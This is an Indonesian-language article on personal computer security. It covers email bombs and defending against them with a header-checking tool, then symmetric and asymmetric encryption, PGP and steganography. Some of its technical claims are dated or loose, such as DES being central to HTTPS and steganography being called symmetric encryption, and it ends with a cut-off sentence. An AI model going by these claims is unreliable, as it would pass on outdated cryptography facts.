Email pribadi dapat saja menjadi serangan email bomb. Sebagai contoh bila seseorang mengirimkan  anda email dengan ukuran attachment 10 Mbyte satu saja setiap hari, akan membuat mailbox anda penuh dan membuat email dari pihak lain ditolak oleh mail server anda.
Lebih parah lagi kalau anda sebagai korban dibuat ber- langganan pada sejumlah besar mailing list. Daftar mailing list dari segala macam jenis dapat dilihat di sini:
Untuk melindungi komputer anda dari email bomb, anda dapat menggunakan  Email Remover, yang dapat di- download di http://eremover.bizhosting.com/



Dengan  Email Remover anda dapat memeriksa email melalui header-nya dulu, dan email dapat dihapus tanpa harus men-download-nya.








Apabila From: berbeda  dengan  X-Sender, maka palimng tidak anda tahu siapa pengitrim email yang sebenarnya.



Email Bomb
Email dapat digunakan untuk melumpuhkan  komputer yang terhubung ke Internet,  bahkan seluruh jaringan komputer perusahaan dapat dilumpuhkan  dengan email bomb. Untuk melakukan hal ini jumlah email dan ukur- annya harus cukup besar untuk melumpuhkan  sasarannya.


Dengan Email Remover anda tidak perlu men-download keseluruhan  email, melainkan cukup header-nya saja. Dengan daftar email dan ukurannya anda dapat memper- kirakan email mana yang tidak anda inginkan dan lang- sung anda hapus di sini.



Enkripsi  Email
Kerahasiaan email anda terancam bukan oleh para hacker ataupun agen-agen rahasia, melainkan para system  ad- ministrator  sendiri. Para system  administrator  kadang- kadang bosan tidak tahu apa yang harus dikerjakan selain membaca-baca email orang. Mereka dapat melakukannya tampa sedikit pun meninggalkan  jejak.


Symmetric Encryption
Cara mengatasi hal ini adalah dengan mengenkripsi email anda. Ada dua macam enkripsi, Symmetric Encryption dan Asymmetric Encryption. Pada symmetric encryption, pe- ngirim dan penerima menggunakan  kunci yang sama (simetrik). Yang menjadi masalah adalah bahwa kunci ini harus dikirim pada penerima agar dapat membuka file yang dienkripsi tadi. Kunci ini harus dikirim lewat jalur yang aman, baik lewat telepon, disket, atau format penyimpan data lainnya. Dan tentunya jangan dikirin lewat pos biasa.
Standard yang terkenal dalam hal symmetric encrytion ini adalah DES (Data Encryption Standard) yang dikem- bangkan oleh IBM dan NSA (National Security Agency) pada awal tahun 70-an. Sekarang ini DES digunakan dalam banyak sistem di Internet  seperti secure web protocol (HTTPS) dan SSL selain juga pada home banking standard (HBCI). Salah satu variasi DES adalah Triple DES (3DES) yang memproses tiga proses sehingga mencapai panjang kunci total 192 bit.

Asymmetric Encryption
Untuk mengatasi masalah pengiriman kunci seperti yang terdapat pada symmetric encryptrion, dikembangkan asymmetric encryption, yang di sini kedua belah pihak memegang satu dari pasangan kunci.
Personal key hanya untuk pemakaian sendiri dan harus tetap rahasia dan tidak diberikan pada orang lain. Kunci ini dapat men-enkrip  dan men-dekrip pesan yang dienkripsi dengan public key.
Public key ditujukan untuk didistribusikan pada rekan komunikasi dari pemegang private key. Public key akan digunakan untuk mengirimkan  pesan terenkripsi yang hanya dapat dibuka menggunakan  private key.
Untuk memudahkan  pengertian, bayangkan bahwa public key adalah gembok sedangkan private key adalah anak kuncinya. Pemilik anak kunci mengirim gembok pada rekanannya  dan meminta agar pesan yang dikirim digem- bok dulu sebelum dikirim. Pesan itu aman dalam perjalanan sebab pesan yang sudah digembok tidak bisa dibuka sebab kunci untuk membukanya  hanya ada di pihak penerima pesan (yang juga pengirim gembok tadi).
Proses enkripsi asimetrik yang paling terkenal adalah RSA (dari nama penciptanya Rivest, Shamir, dan Adleman). RSA menggunakan  proses matematis yang lebih kompleks dibandingkan dengan DES. Hal ini membuatnya memer- lukan waktu lebih lama untuk membentuk enkripsi yang lebih aman. Anda harus memilih antara keamanan dengan efisiensi.

Personal Encryption
Kriptografi yang mudah digunakan namun tangguh baru ada semenjak Phil Zimmerman memperkenalkan  pro- gramnya PGP (Pretty Good Privacy) pada tahun 1991. PGP memanfaatkan public key cryptography  untuk enkripsi dan digital signing terhadap file-file umum seperti email. PGP











dengan cepat menjadi standar de facto untuk personal cryp- tography, walaupun PGP masih merupakan produk yang dibatasi ekspornya oleh pemerintah AS, sehingga Zim- merman bolak-balik diperiksa oleh pejabat bea cukai AS selama tiga tahun.
PGP adalah sistem enkripsi hybrid, yang memanfaatkan baik public key maupun algoritma enkripsi konvensional. Untuk meng-enkrip  suatu pesan, suatu kunci rahasia diciptakan dan digunakan untuk mengenkripsi pesan itu. Kunci ini kemudian dienkripsi dengan public key dari penerima pesan dan di-attach bersama pesan yang dien- kripsi tadi.
PGP juga digunakan sebagai digital signature yang me- mastikan bahwa suatu pesan memang pesan asli dari pengirimnya.
PGP dapat diperoleh bebas untuk pemakaian pribadi dan bentuknya  yang paling populer adalah seri v2.6.x meng- gunakan algoritma IDEA (lisensi gratis untuk pemakaian pribadi pada PGP) untuk key encryption rahasianya dan algoritma RSA untuk bagian public key-nya.

Steganografi
Berbeda dengan PGP yang mengenkripsi file menjadi teks acak, maka steganografi men-enkripsi teks dengan me- nyembunyikannya pada file gambar atau suara. Stegano- grafi adalah salah satu jenis enkripsi yang menggunakan symmetric key.




Penutup
Masih ada lagi beberapa aspek yang sejalan dengan topik Hacking dan PC Security, di antaranya  adalah web site hacking yang sering terjadi sekarang ini. Web site hacking banyak terjadi pada sistem-sistem  yang menggunakan  IIS (dengan Windows NT/2000) mengingat cukup banyak kelemahan-kelemahan pada sistem ini.
Namun demikian, karena titik berat bahasan ini adalah untuk keamanan pemakai komputer, topik ini tidak diba- has dalam makalah ini. Remote hacking terhadap server Windows NT dengan memanfaatkan  kelemahan Unicode-




Tamat :v